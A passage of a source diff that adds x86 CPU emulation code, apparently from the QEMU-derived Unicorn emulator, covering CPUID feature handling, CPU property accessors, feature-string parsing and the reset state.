CPUID_EXT2_PAT | + CPUID_EXT2_CMOV | CPUID_EXT2_MCA | CPUID_EXT2_PGE | + CPUID_EXT2_MTRR | CPUID_EXT2_SYSCALL | CPUID_EXT2_APIC | + CPUID_EXT2_CX8 | CPUID_EXT2_MCE | CPUID_EXT2_PAE | CPUID_EXT2_MSR | + CPUID_EXT2_TSC | CPUID_EXT2_PSE | CPUID_EXT2_DE | CPUID_EXT2_FPU, + // FEAT_8000_0001_ECX + CPUID_EXT3_TBM | CPUID_EXT3_FMA4 | CPUID_EXT3_XOP | + CPUID_EXT3_3DNOWPREFETCH | CPUID_EXT3_MISALIGNSSE | + CPUID_EXT3_SSE4A | CPUID_EXT3_ABM | CPUID_EXT3_SVM | + CPUID_EXT3_LAHF_LM, + }, + "AMD Opteron 63xx class CPU", + }, +}; + +static uint32_t x86_cpu_get_supported_feature_word(struct uc_struct *uc, FeatureWord w); + +static void report_unavailable_features(FeatureWord w, uint32_t mask) +{ + FeatureWordInfo *f = &feature_word_info[w]; + int i; + + for (i = 0; i < 32; ++i) { + if (1 << i & mask) { + const char *reg = get_register_name_32(f->cpuid_reg); + assert(reg); + fprintf(stderr, "warning: %s doesn't support requested feature: " + "CPUID.%02XH:%s%s%s [bit %d]\n", + "TCG", + f->cpuid_eax, reg, + f->feat_names[i] ? "." : "", + f->feat_names[i] ? f->feat_names[i] : "", i); + } + } +} + +static void x86_cpuid_version_get_family(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + CPUX86State *env = &cpu->env; + int64_t value; + + value = (env->cpuid_version >> 8) & 0xf; + if (value == 0xf) { + value += (env->cpuid_version >> 20) & 0xff; + } + visit_type_int(v, &value, name, errp); +} + +static int x86_cpuid_version_set_family(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + CPUX86State *env = &cpu->env; + const int64_t min = 0; + const int64_t max = 0xff + 0xf; + Error *local_err = NULL; + int64_t value; + + visit_type_int(v, &value, name, &local_err); + if (local_err) { + error_propagate(errp, local_err); + return -1; + } + if (value < min || value > max) { + error_set(errp, QERR_PROPERTY_VALUE_OUT_OF_RANGE, "", + name ? name : "null", value, min, max); + return -1; + } + + env->cpuid_version &= ~0xff00f00; + if (value > 0x0f) { + env->cpuid_version |= 0xf00 | ((value - 0x0f) << 20); + } else { + env->cpuid_version |= value << 8; + } + + return 0; +} + +static void x86_cpuid_version_get_model(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + CPUX86State *env = &cpu->env; + int64_t value; + + value = (env->cpuid_version >> 4) & 0xf; + value |= ((env->cpuid_version >> 16) & 0xf) << 4; + visit_type_int(v, &value, name, errp); +} + +static int x86_cpuid_version_set_model(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + CPUX86State *env = &cpu->env; + const int64_t min = 0; + const int64_t max = 0xff; + Error *local_err = NULL; + int64_t value; + + visit_type_int(v, &value, name, &local_err); + if (local_err) { + error_propagate(errp, local_err); + return -1; + } + if (value < min || value > max) { + error_set(errp, QERR_PROPERTY_VALUE_OUT_OF_RANGE, "", + name ? name : "null", value, min, max); + return -1; + } + + env->cpuid_version &= ~0xf00f0; + env->cpuid_version |= ((value & 0xf) << 4) | ((value >> 4) << 16); + + return 0; +} + +static void x86_cpuid_version_get_stepping(struct uc_struct *uc, Object *obj, Visitor *v, + void *opaque, const char *name, + Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + CPUX86State *env = &cpu->env; + int64_t value; + + value = env->cpuid_version & 0xf; + visit_type_int(v, &value, name, errp); +} + +static int x86_cpuid_version_set_stepping(struct uc_struct *uc, Object *obj, Visitor *v, + void *opaque, const char *name, + Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + CPUX86State *env = &cpu->env; + const int64_t min = 0; + const int64_t max = 0xf; + Error *local_err = NULL; + int64_t value; + + visit_type_int(v, &value, name, &local_err); + if (local_err) { + error_propagate(errp, local_err); + return -1; + } + if (value < min || value > max) { + error_set(errp, QERR_PROPERTY_VALUE_OUT_OF_RANGE, "", + name ? name : "null", value, min, max); + return -1; + } + + env->cpuid_version &= ~0xf; + env->cpuid_version |= value & 0xf; + + return 0; +} + +static void x86_cpuid_get_level(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + + visit_type_uint32(v, &cpu->env.cpuid_level, name, errp); +} + +static int x86_cpuid_set_level(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + + visit_type_uint32(v, &cpu->env.cpuid_level, name, errp); + + return 0; +} + +static void x86_cpuid_get_xlevel(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + + visit_type_uint32(v, &cpu->env.cpuid_xlevel, name, errp); +} + +static int x86_cpuid_set_xlevel(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + + visit_type_uint32(v, &cpu->env.cpuid_xlevel, name, errp); + + return 0; +} + +static char *x86_cpuid_get_vendor(struct uc_struct *uc, Object *obj, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + CPUX86State *env = &cpu->env; + char *value; + + value = (char *)g_malloc(CPUID_VENDOR_SZ + 1); + x86_cpu_vendor_words2str(value, env->cpuid_vendor1, env->cpuid_vendor2, + env->cpuid_vendor3); + return value; +} + +static int x86_cpuid_set_vendor(struct uc_struct *uc, Object *obj, const char *value, + Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + CPUX86State *env = &cpu->env; + int i; + + if (strlen(value) != CPUID_VENDOR_SZ) { + error_set(errp, QERR_PROPERTY_VALUE_BAD, "", + "vendor", value); + return -1; + } + + env->cpuid_vendor1 = 0; + env->cpuid_vendor2 = 0; + env->cpuid_vendor3 = 0; + for (i = 0; i < 4; i++) { + env->cpuid_vendor1 |= ((uint8_t)value[i ]) << (8 * i); + env->cpuid_vendor2 |= ((uint8_t)value[i + 4]) << (8 * i); + env->cpuid_vendor3 |= ((uint8_t)value[i + 8]) << (8 * i); + } + + return 0; +} + +static char *x86_cpuid_get_model_id(struct uc_struct *uc, Object *obj, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + CPUX86State *env = &cpu->env; + char *value; + int i; + + value = g_malloc(48 + 1); + for (i = 0; i < 48; i++) { + value[i] = env->cpuid_model[i >> 2] >> (8 * (i & 3)); + } + value[48] = '\0'; + return value; +} + +static int x86_cpuid_set_model_id(struct uc_struct *uc, Object *obj, const char *model_id, + Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + CPUX86State *env = &cpu->env; + int c, len, i; + + if (model_id == NULL) { + model_id = ""; + } + len = strlen(model_id); + memset(env->cpuid_model, 0, 48); + for (i = 0; i < 48; i++) { + if (i >= len) { + c = '\0'; + } else { + c = (uint8_t)model_id[i]; + } + env->cpuid_model[i >> 2] |= c << (8 * (i & 3)); + } + + return 0; +} + +static void x86_cpuid_get_tsc_freq(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + int64_t value; + + value = cpu->env.tsc_khz * 1000; + visit_type_int(v, &value, name, errp); +} + +static int x86_cpuid_set_tsc_freq(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + const int64_t min = 0; + const int64_t max = INT64_MAX; + Error *local_err = NULL; + int64_t value; + + visit_type_int(v, &value, name, &local_err); + if (local_err) { + error_propagate(errp, local_err); + return -1; + } + if (value < min || value > max) { + error_set(errp, QERR_PROPERTY_VALUE_OUT_OF_RANGE, "", + name ? name : "null", value, min, max); + return -1; + } + + cpu->env.tsc_khz = (int)(value / 1000); + + return 0; +} + +static void x86_cpuid_get_apic_id(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + int64_t value = cpu->env.cpuid_apic_id; + + visit_type_int(v, &value, name, errp); +} + +static int x86_cpuid_set_apic_id(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + DeviceState *dev = DEVICE(uc, obj); + const int64_t min = 0; + const int64_t max = UINT32_MAX; + Error *error = NULL; + int64_t value; + + if (dev->realized) { + error_setg(errp, "Attempt to set property '%s' on '%s' after " + "it was realized", name, object_get_typename(obj)); + return -1; + } + + visit_type_int(v, &value, name, &error); + if (error) { + error_propagate(errp, error); + return -1; + } + if (value < min || value > max) { + error_setg(errp, "Property %s.%s doesn't take value %" PRId64 + " (minimum: %" PRId64 ", maximum: %" PRId64 ")" , + object_get_typename(obj), name, value, min, max); + return -1; + } + + if ((value != cpu->env.cpuid_apic_id) && cpu_exists(uc, value)) { + error_setg(errp, "CPU with APIC ID %" PRIi64 " exists", value); + return -1; + } + cpu->env.cpuid_apic_id = (uint32_t)value; + + return 0; +} + +/* Generic getter for "feature-words" and "filtered-features" properties */ +static void x86_cpu_get_feature_words(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + uint32_t *array = (uint32_t *)opaque; + FeatureWord w; + Error *err = NULL; + // These all get setup below, so no need to initialise them here. + X86CPUFeatureWordInfo word_infos[FEATURE_WORDS]; + X86CPUFeatureWordInfoList list_entries[FEATURE_WORDS]; + X86CPUFeatureWordInfoList *list = NULL; + + for (w = 0; w < FEATURE_WORDS; w++) { + FeatureWordInfo *wi = &feature_word_info[w]; + X86CPUFeatureWordInfo *qwi = &word_infos[w]; + qwi->cpuid_input_eax = wi->cpuid_eax; + qwi->has_cpuid_input_ecx = wi->cpuid_needs_ecx; + qwi->cpuid_input_ecx = wi->cpuid_ecx; + qwi->cpuid_register = x86_reg_info_32[wi->cpuid_reg].qapi_enum; + qwi->features = array[w]; + + /* List will be in reverse order, but order shouldn't matter */ + list_entries[w].next = list; + list_entries[w].value = &word_infos[w]; + list = &list_entries[w]; + } + + visit_type_X86CPUFeatureWordInfoList(v, &list, "feature-words", &err); + error_propagate(errp, err); +} + +/* Convert all '_' in a feature string option name to '-', to make feature + * name conform to QOM property naming rule, which uses '-' instead of '_'. + */ +static inline void feat2prop(char *s) +{ + while ((s = strchr(s, '_'))) { + *s = '-'; + } +} + +/* Parse "+feature,-feature,feature=foo" CPU feature string + */ +static void x86_cpu_parse_featurestr(CPUState *cs, char *features, + Error **errp) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + char *featurestr; /* Single 'key=value" string being parsed */ + FeatureWord w; + /* Features to be added */ + FeatureWordArray plus_features = { 0 }; + /* Features to be removed */ + FeatureWordArray minus_features = { 0 }; + uint32_t numvalue; + CPUX86State *env = &cpu->env; + Error *local_err = NULL; + + featurestr = features ? strtok(features, ",") : NULL; + + while (featurestr) { + char *val; + if (featurestr[0] == '+') { + add_flagname_to_bitmaps(featurestr + 1, plus_features, &local_err); + } else if (featurestr[0] == '-') { + add_flagname_to_bitmaps(featurestr + 1, minus_features, &local_err); + } else if ((val = strchr(featurestr, '='))) { + *val = 0; val++; + feat2prop(featurestr); + if (!strcmp(featurestr, "xlevel")) { + char *err; + char num[32]; + + numvalue = strtoul(val, &err, 0); + if (!*val || *err) { + error_setg(errp, "bad numerical value %s", val); + return; + } + if (numvalue < 0x80000000) { + numvalue += 0x80000000; + } + snprintf(num, sizeof(num), "%" PRIu32, numvalue); + object_property_parse(cs->uc, OBJECT(cpu), num, featurestr, &local_err); + } else if (!strcmp(featurestr, "tsc-freq")) { + int64_t tsc_freq; + char *err; + char num[32]; + + tsc_freq = strtosz_suffix_unit(val, &err, + STRTOSZ_DEFSUFFIX_B, 1000); + if (tsc_freq < 0 || *err) { + error_setg(errp, "bad numerical value %s", val); + return; + } + snprintf(num, sizeof(num), "%" PRId64, tsc_freq); + object_property_parse(cs->uc, OBJECT(cpu), num, "tsc-frequency", + &local_err); + } else if (!strcmp(featurestr, "hv-spinlocks")) { + char *err; + const int min = 0xFFF; + char num[32]; + numvalue = strtoul(val, &err, 0); + if (!*val || *err) { + error_setg(errp, "bad numerical value %s", val); + return; + } + if (numvalue < (uint32_t)min) { + numvalue = min; + } + snprintf(num, sizeof(num), "%" PRId32, numvalue); + object_property_parse(cs->uc, OBJECT(cpu), num, featurestr, &local_err); + } else { + object_property_parse(cs->uc, OBJECT(cpu), val, featurestr, &local_err); + } + } else { + feat2prop(featurestr); + object_property_parse(cs->uc, OBJECT(cpu), "on", featurestr, &local_err); + } + if (local_err) { + error_propagate(errp, local_err); + return; + } + featurestr = strtok(NULL, ","); + } + + if (cpu->host_features) { + for (w = 0; w < FEATURE_WORDS; w++) { + env->features[w] = + x86_cpu_get_supported_feature_word(env->uc, w); + } + } + + for (w = 0; w < FEATURE_WORDS; w++) { + env->features[w] |= plus_features[w]; + env->features[w] &= ~minus_features[w]; + } +} + +static uint32_t x86_cpu_get_supported_feature_word(struct uc_struct *uc, FeatureWord w) +{ + FeatureWordInfo *wi = &feature_word_info[w]; + + if (tcg_enabled(uc)) { + return wi->tcg_features; + } else { + return ~0; + } +} + +/* + * Filters CPU feature words based on host availability of each feature. + * + * Returns: 0 if all flags are supported by the host, non-zero otherwise. + */ +static int x86_cpu_filter_features(X86CPU *cpu) +{ + CPUX86State *env = &cpu->env; + FeatureWord w; + int rv = 0; + + for (w = 0; w < FEATURE_WORDS; w++) { + uint32_t host_feat = x86_cpu_get_supported_feature_word(env->uc, w); + uint32_t requested_features = env->features[w]; + env->features[w] &= host_feat; + cpu->filtered_features[w] = requested_features & ~env->features[w]; + if (cpu->filtered_features[w]) { + if (cpu->check_cpuid || cpu->enforce_cpuid) { + report_unavailable_features(w, cpu->filtered_features[w]); + } + rv = 1; + } + } + + return rv; +} + +/* Load data from X86CPUDefinition + */ +static void x86_cpu_load_def(X86CPU *cpu, X86CPUDefinition *def, Error **errp) +{ + CPUX86State *env = &cpu->env; + const char *vendor; + FeatureWord w; + + object_property_set_int(env->uc, OBJECT(cpu), def->level, "level", errp); + object_property_set_int(env->uc, OBJECT(cpu), def->family, "family", errp); + object_property_set_int(env->uc, OBJECT(cpu), def->model, "model", errp); + object_property_set_int(env->uc, OBJECT(cpu), def->stepping, "stepping", errp); + object_property_set_int(env->uc, OBJECT(cpu), def->xlevel, "xlevel", errp); + env->cpuid_xlevel2 = def->xlevel2; + cpu->cache_info_passthrough = def->cache_info_passthrough; + object_property_set_str(env->uc, OBJECT(cpu), def->model_id, "model-id", errp); + for (w = 0; w < FEATURE_WORDS; w++) { + env->features[w] = def->features[w]; + } + + env->features[FEAT_1_ECX] |= CPUID_EXT_HYPERVISOR; + + /* sysenter isn't supported in compatibility mode on AMD, + * syscall isn't supported in compatibility mode on Intel. + * Normally we advertise the actual CPU vendor, but you can + * override this using the 'vendor' property if you want to use + * KVM's sysenter/syscall emulation in compatibility mode and + * when doing cross vendor migration + */ + vendor = def->vendor; + + object_property_set_str(env->uc, OBJECT(cpu), vendor, "vendor", errp); +} + +X86CPU *cpu_x86_create(struct uc_struct *uc, const char *cpu_model, Error **errp) +{ + X86CPU *cpu = NULL; + ObjectClass *oc; + gchar **model_pieces; + char *name, *features; + Error *error = NULL; + + model_pieces = g_strsplit(cpu_model, ",", 2); + if (!model_pieces[0]) { + error_setg(&error, "Invalid/empty CPU model name"); + goto out; + } + name = model_pieces[0]; + features = model_pieces[1]; + + oc = x86_cpu_class_by_name(uc, name); + if (oc == NULL) { + error_setg(&error, "Unable to find CPU definition: %s", name); + goto out; + } + + cpu = X86_CPU(uc, object_new(uc, object_class_get_name(oc))); + + x86_cpu_parse_featurestr(CPU(cpu), features, &error); + if (error) { + goto out; + } + +out: + if (error != NULL) { + error_propagate(errp, error); + if (cpu) { + object_unref(uc, OBJECT(cpu)); + cpu = NULL; + } + } + g_strfreev(model_pieces); + return cpu; +} + +X86CPU *cpu_x86_init(struct uc_struct *uc, const char *cpu_model) +{ + Error *error = NULL; + X86CPU *cpu; + + cpu = cpu_x86_create(uc, cpu_model, &error); + if (error) { + goto out; + } + + object_property_set_bool(uc, OBJECT(cpu), true, "realized", &error); + +out: + if (error) { + error_free(error); + if (cpu != NULL) { + object_unref(uc, OBJECT(cpu)); + cpu = NULL; + } + } + return cpu; +} + +static void x86_cpu_cpudef_class_init(struct uc_struct *uc, ObjectClass *oc, void *data) +{ + X86CPUDefinition *cpudef = data; + X86CPUClass *xcc = X86_CPU_CLASS(uc, oc); + + xcc->cpu_def = cpudef; +} + +static void x86_register_cpudef_type(struct uc_struct *uc, X86CPUDefinition *def) +{ + char *typename = x86_cpu_type_name(def->name); + TypeInfo ti = { + typename, + TYPE_X86_CPU, + + 0, + 0, + NULL, + + NULL, + NULL, + NULL, + + def, + + x86_cpu_cpudef_class_init, + }; + + type_register(uc, &ti); + g_free(typename); +} + +#if !defined(CONFIG_USER_ONLY) + +void cpu_clear_apic_feature(CPUX86State *env) +{ + env->features[FEAT_1_EDX] &= ~CPUID_APIC; +} + +#endif /* !CONFIG_USER_ONLY */ + +/* Initialize list of CPU models, filling some non-static fields if necessary + */ +void x86_cpudef_setup(void) +{ + int i, j; + static const char *model_with_versions[] = { "qemu32", "qemu64", "athlon" }; + + for (i = 0; i < ARRAY_SIZE(builtin_x86_defs); ++i) { + X86CPUDefinition *def = &builtin_x86_defs[i]; + + /* Look for specific "cpudef" models that */ + /* have the QEMU version in .model_id */ + for (j = 0; j < ARRAY_SIZE(model_with_versions); j++) { + if (strcmp(model_with_versions[j], def->name) == 0) { + pstrcpy(def->model_id, sizeof(def->model_id), + "QEMU Virtual CPU version "); + break; + } + } + } +} + +static void get_cpuid_vendor(CPUX86State *env, uint32_t *ebx, + uint32_t *ecx, uint32_t *edx) +{ + *ebx = env->cpuid_vendor1; + *edx = env->cpuid_vendor2; + *ecx = env->cpuid_vendor3; +} + +void cpu_x86_cpuid(CPUX86State *env, uint32_t index, uint32_t count, + uint32_t *eax, uint32_t *ebx, + uint32_t *ecx, uint32_t *edx) +{ + X86CPU *cpu = x86_env_get_cpu(env); + CPUState *cs = CPU(cpu); + + /* test if maximum index reached */ + if (index & 0x80000000) { + if (index > env->cpuid_xlevel) { + if (env->cpuid_xlevel2 > 0) { + /* Handle the Centaur's CPUID instruction. */ + if (index > env->cpuid_xlevel2) { + index = env->cpuid_xlevel2; + } else if (index < 0xC0000000) { + index = env->cpuid_xlevel; + } + } else { + /* Intel documentation states that invalid EAX input will + * return the same information as EAX=cpuid_level + * (Intel SDM Vol. 2A - Instruction Set Reference - CPUID) + */ + index = env->cpuid_level; + } + } + } else { + if (index > env->cpuid_level) + index = env->cpuid_level; + } + + switch(index) { + case 0: + *eax = env->cpuid_level; + get_cpuid_vendor(env, ebx, ecx, edx); + break; + case 1: + *eax = env->cpuid_version; + *ebx = (env->cpuid_apic_id << 24) | 8 << 8; /* CLFLUSH size in quad words, Linux wants it. */ + *ecx = env->features[FEAT_1_ECX]; + *edx = env->features[FEAT_1_EDX]; + if (cs->nr_cores * cs->nr_threads > 1) { + *ebx |= (cs->nr_cores * cs->nr_threads) << 16; + *edx |= 1 << 28; /* HTT bit */ + } + break; + case 2: + /* cache info: needed for Pentium Pro compatibility */ + if (cpu->cache_info_passthrough) { + host_cpuid(index, 0, eax, ebx, ecx, edx); + break; + } + *eax = 1; /* Number of CPUID[EAX=2] calls required */ + *ebx = 0; + *ecx = 0; + *edx = (L1D_DESCRIPTOR << 16) | \ + (L1I_DESCRIPTOR << 8) | \ + (L2_DESCRIPTOR); + break; + case 4: + /* cache info: needed for Core compatibility */ + if (cpu->cache_info_passthrough) { + host_cpuid(index, count, eax, ebx, ecx, edx); + *eax &= ~0xFC000000; + } else { + *eax = 0; + switch (count) { + case 0: /* L1 dcache info */ + *eax |= CPUID_4_TYPE_DCACHE | \ + CPUID_4_LEVEL(1) | \ + CPUID_4_SELF_INIT_LEVEL; + *ebx = (L1D_LINE_SIZE - 1) | \ + ((L1D_PARTITIONS - 1) << 12) | \ + ((L1D_ASSOCIATIVITY - 1) << 22); + *ecx = L1D_SETS - 1; + *edx = CPUID_4_NO_INVD_SHARING; + break; + case 1: /* L1 icache info */ + *eax |= CPUID_4_TYPE_ICACHE | \ + CPUID_4_LEVEL(1) | \ + CPUID_4_SELF_INIT_LEVEL; + *ebx = (L1I_LINE_SIZE - 1) | \ + ((L1I_PARTITIONS - 1) << 12) | \ + ((L1I_ASSOCIATIVITY - 1) << 22); + *ecx = L1I_SETS - 1; + *edx = CPUID_4_NO_INVD_SHARING; + break; + case 2: /* L2 cache info */ + *eax |= CPUID_4_TYPE_UNIFIED | \ + CPUID_4_LEVEL(2) | \ + CPUID_4_SELF_INIT_LEVEL; + if (cs->nr_threads > 1) { + *eax |= (cs->nr_threads - 1) << 14; + } + *ebx = (L2_LINE_SIZE - 1) | \ + ((L2_PARTITIONS - 1) << 12) | \ + ((L2_ASSOCIATIVITY - 1) << 22); + *ecx = L2_SETS - 1; + *edx = CPUID_4_NO_INVD_SHARING; + break; + default: /* end of info */ + *eax = 0; + *ebx = 0; + *ecx = 0; + *edx = 0; + break; + } + } + + /* QEMU gives out its own APIC IDs, never pass down bits 31..26. */ + if ((*eax & 31) && cs->nr_cores > 1) { + *eax |= (cs->nr_cores - 1) << 26; + } + break; + case 5: + /* mwait info: needed for Core compatibility */ + *eax = 0; /* Smallest monitor-line size in bytes */ + *ebx = 0; /* Largest monitor-line size in bytes */ + *ecx = CPUID_MWAIT_EMX | CPUID_MWAIT_IBE; + *edx = 0; + break; + case 6: + /* Thermal and Power Leaf */ + *eax = 0; + *ebx = 0; + *ecx = 0; + *edx = 0; + break; + case 7: + /* Structured Extended Feature Flags Enumeration Leaf */ + if (count == 0) { + *eax = 0; /* Maximum ECX value for sub-leaves */ + *ebx = env->features[FEAT_7_0_EBX]; /* Feature flags */ + *ecx = 0; /* Reserved */ + *edx = 0; /* Reserved */ + } else { + *eax = 0; + *ebx = 0; + *ecx = 0; + *edx = 0; + } + break; + case 9: + /* Direct Cache Access Information Leaf */ + *eax = 0; /* Bits 0-31 in DCA_CAP MSR */ + *ebx = 0; + *ecx = 0; + *edx = 0; + break; + case 0xA: + /* Architectural Performance Monitoring Leaf */ + *eax = 0; + *ebx = 0; + *ecx = 0; + *edx = 0; + break; + case 0xD: { + break; + } + case 0x80000000: + *eax = env->cpuid_xlevel; + *ebx = env->cpuid_vendor1; + *edx = env->cpuid_vendor2; + *ecx = env->cpuid_vendor3; + break; + case 0x80000001: + *eax = env->cpuid_version; + *ebx = 0; + *ecx = env->features[FEAT_8000_0001_ECX]; + *edx = env->features[FEAT_8000_0001_EDX]; + + /* The Linux kernel checks for the CMPLegacy bit and + * discards multiple thread information if it is set. + * So dont set it here for Intel to make Linux guests happy. + */ + if (cs->nr_cores * cs->nr_threads > 1) { + uint32_t tebx, tecx, tedx; + get_cpuid_vendor(env, &tebx, &tecx, &tedx); + if (tebx != CPUID_VENDOR_INTEL_1 || + tedx != CPUID_VENDOR_INTEL_2 || + tecx != CPUID_VENDOR_INTEL_3) { + *ecx |= 1 << 1; /* CmpLegacy bit */ + } + } + break; + case 0x80000002: + case 0x80000003: + case 0x80000004: + *eax = env->cpuid_model[(index - 0x80000002) * 4 + 0]; + *ebx = env->cpuid_model[(index - 0x80000002) * 4 + 1]; + *ecx = env->cpuid_model[(index - 0x80000002) * 4 + 2]; + *edx = env->cpuid_model[(index - 0x80000002) * 4 + 3]; + break; + case 0x80000005: + /* cache info (L1 cache) */ + if (cpu->cache_info_passthrough) { + host_cpuid(index, 0, eax, ebx, ecx, edx); + break; + } + *eax = (L1_DTLB_2M_ASSOC << 24) | (L1_DTLB_2M_ENTRIES << 16) | \ + (L1_ITLB_2M_ASSOC << 8) | (L1_ITLB_2M_ENTRIES); + *ebx = (L1_DTLB_4K_ASSOC << 24) | (L1_DTLB_4K_ENTRIES << 16) | \ + (L1_ITLB_4K_ASSOC << 8) | (L1_ITLB_4K_ENTRIES); + *ecx = (L1D_SIZE_KB_AMD << 24) | (L1D_ASSOCIATIVITY_AMD << 16) | \ + (L1D_LINES_PER_TAG << 8) | (L1D_LINE_SIZE); + *edx = (L1I_SIZE_KB_AMD << 24) | (L1I_ASSOCIATIVITY_AMD << 16) | \ + (L1I_LINES_PER_TAG << 8) | (L1I_LINE_SIZE); + break; + case 0x80000006: + /* cache info (L2 cache) */ + if (cpu->cache_info_passthrough) { + host_cpuid(index, 0, eax, ebx, ecx, edx); + break; + } + *eax = (AMD_ENC_ASSOC(L2_DTLB_2M_ASSOC) << 28) | \ + (L2_DTLB_2M_ENTRIES << 16) | \ + (AMD_ENC_ASSOC(L2_ITLB_2M_ASSOC) << 12) | \ + (L2_ITLB_2M_ENTRIES); + *ebx = (AMD_ENC_ASSOC(L2_DTLB_4K_ASSOC) << 28) | \ + (L2_DTLB_4K_ENTRIES << 16) | \ + (AMD_ENC_ASSOC(L2_ITLB_4K_ASSOC) << 12) | \ + (L2_ITLB_4K_ENTRIES); + *ecx = (L2_SIZE_KB_AMD << 16) | \ + (AMD_ENC_ASSOC(L2_ASSOCIATIVITY) << 12) | \ + (L2_LINES_PER_TAG << 8) | (L2_LINE_SIZE); + *edx = ((L3_SIZE_KB/512) << 18) | \ + (AMD_ENC_ASSOC(L3_ASSOCIATIVITY) << 12) | \ + (L3_LINES_PER_TAG << 8) | (L3_LINE_SIZE); + break; + case 0x80000007: + *eax = 0; + *ebx = 0; + *ecx = 0; + *edx = env->features[FEAT_8000_0007_EDX]; + break; + case 0x80000008: + /* virtual & phys address size in low 2 bytes. */ +/* XXX: This value must match the one used in the MMU code. */ + if (env->features[FEAT_8000_0001_EDX] & CPUID_EXT2_LM) { + /* 64 bit processor */ +/* XXX: The physical address space is limited to 42 bits in exec.c. */ + *eax = 0x00003028; /* 48 bits virtual, 40 bits physical */ + } else { + if (env->features[FEAT_1_EDX] & CPUID_PSE36) { + *eax = 0x00000024; /* 36 bits physical */ + } else { + *eax = 0x00000020; /* 32 bits physical */ + } + } + *ebx = 0; + *ecx = 0; + *edx = 0; + if (cs->nr_cores * cs->nr_threads > 1) { + *ecx |= (cs->nr_cores * cs->nr_threads) - 1; + } + break; + case 0x8000000A: + if (env->features[FEAT_8000_0001_ECX] & CPUID_EXT3_SVM) { + *eax = 0x00000001; /* SVM Revision */ + *ebx = 0x00000010; /* nr of ASIDs */ + *ecx = 0; + *edx = env->features[FEAT_SVM]; /* optional features */ + } else { + *eax = 0; + *ebx = 0; + *ecx = 0; + *edx = 0; + } + break; + case 0xC0000000: + *eax = env->cpuid_xlevel2; + *ebx = 0; + *ecx = 0; + *edx = 0; + break; + case 0xC0000001: + /* Support for VIA CPU's CPUID instruction */ + *eax = env->cpuid_version; + *ebx = 0; + *ecx = 0; + *edx = env->features[FEAT_C000_0001_EDX]; + break; + case 0xC0000002: + case 0xC0000003: + case 0xC0000004: + /* Reserved for the future, and now filled with zero */ + *eax = 0; + *ebx = 0; + *ecx = 0; + *edx = 0; + break; + default: + /* reserved values: zero */ + *eax = 0; + *ebx = 0; + *ecx = 0; + *edx = 0; + break; + } +} + +/* CPUClass::reset() */ +static void x86_cpu_reset(CPUState *s) +{ + X86CPU *cpu = X86_CPU(s->uc, s); + X86CPUClass *xcc = X86_CPU_GET_CLASS(s->uc, cpu); + CPUX86State *env = &cpu->env; + int i; + + xcc->parent_reset(s); + + memset(env, 0, offsetof(CPUX86State, cpuid_level)); + + tlb_flush(s, 1); + + env->old_exception = -1; + + /* init to reset state */ + +#ifdef CONFIG_SOFTMMU + env->hflags |= HF_SOFTMMU_MASK; +#endif + env->hflags2 |= HF2_GIF_MASK; + + cpu_x86_update_cr0(env, 0x60000010); + env->a20_mask = ~0x0; + env->smbase = 0x30000; + + env->idt.limit = 0xffff; + env->gdt.limit = 0xffff; + env->ldt.limit = 0xffff; + env->ldt.flags = DESC_P_MASK | (2 << DESC_TYPE_SHIFT); + env->tr.limit = 0xffff; + env->tr.flags = DESC_P_MASK | (11 << DESC_TYPE_SHIFT); + + cpu_x86_load_seg_cache(env, R_CS, 0xf000, 0xffff0000, 0xffff, + DESC_P_MASK | DESC_S_MASK | DESC_CS_MASK | + DESC_R_MASK | DESC_A_MASK); + cpu_x86_load_seg_cache(env, R_DS, 0, 0, 0xffff, + DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | + DESC_A_MASK); + cpu_x86_load_seg_cache(env, R_ES, 0, 0, 0xffff, + DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | + DESC_A_MASK); + cpu_x86_load_seg_cache(env, R_SS, 0, 0, 0xffff, + DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | + DESC_A_MASK); + cpu_x86_load_seg_cache(env, R_FS, 0, 0, 0xffff, + DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | + DESC_A_MASK); + cpu_x86_load_seg_cache(env, R_GS, 0, 0, 0xffff, + DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | + DESC_A_MASK); + + env->eip = 0xfff0; + env->regs[R_EDX] = env->cpuid_version; + + env->eflags = 0x2; + + /* FPU init */ + for (i = 0; i < 8; i++) { + env->fptags[i] = 1; + } + cpu_set_fpuc(env, 0x37f); + + env->mxcsr = 0x1f80; + 